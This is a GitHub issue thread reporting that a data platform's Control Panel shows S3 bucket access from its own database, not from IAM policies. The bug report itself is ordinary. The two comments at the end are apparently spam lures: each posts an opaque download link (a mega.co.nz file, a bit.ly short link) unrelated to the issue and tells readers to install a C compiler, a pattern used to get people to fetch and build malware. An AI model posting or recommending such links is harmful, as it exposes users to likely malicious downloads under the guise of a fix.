### ISSUE TITLE
🐞 AP Control Panel Warehouse Data page doesn't reflect users S3 access

### ISSUE THREAD

**Issue by tom-webber** [ministryofjustice/analytical-platform#5393]
### Describe the bug.

The AP Control Panel Warehouse Data page shows the data sources (s3 buckets) created through the Control Panel. What gets displayed to users is read from the _Control Panel database_, not from aws IAM policies.

This means that a user may have access to a data source listed in the Warehouse Data page (e.g. via [standard-database-access](https://github.com/moj-analytical-services/data-engineering-database-access/blob/5e5ef986bbd00a005051c5e0b30df685943fccc1/README.md#standard-database-access)), but Control Panel will show the user as not having access.

### To Reproduce

Add a fresh user to [standard-database-access](https://github.com/moj-analytical-services/data-engineering-database-access/blob/5e5ef986bbd00a005051c5e0b30df685943fccc1/README.md#standard-database-access), then look for the `alpha-everyone` data source in the Warehouse Data page of Control Panel - it should say that the user does not have access, even though they have bucket and key access in their alpha_user IAM policies.

### Expected Behaviour

Warehouse Data should reflect the state of the alpha_user access policies, matching up permissions granted outside Control Panel with the data sources listed in Warehouse Data.

### Additional context

[Relevant Slack thread](https://mojdt.slack.com/archives/C04M8224WCV/p1726585756216019).
[Relevant user issue](https://github.com/ministryofjustice/data-platform-support/issues/835).

**Comment by nhatlaso1** [comment]
download
https://mega.co.nz/#!9vE0jIrD!nkSuAAbrT1Sjn01VjaQfVQGAFLqvdIF4EkMeSLuKCWw

you may need to install the c compiler

**Comment by achilles0x** [comment]
try this
https://bit.ly/4evXrQ6
If you don't have the c compliator, install it.(gcc or clang)
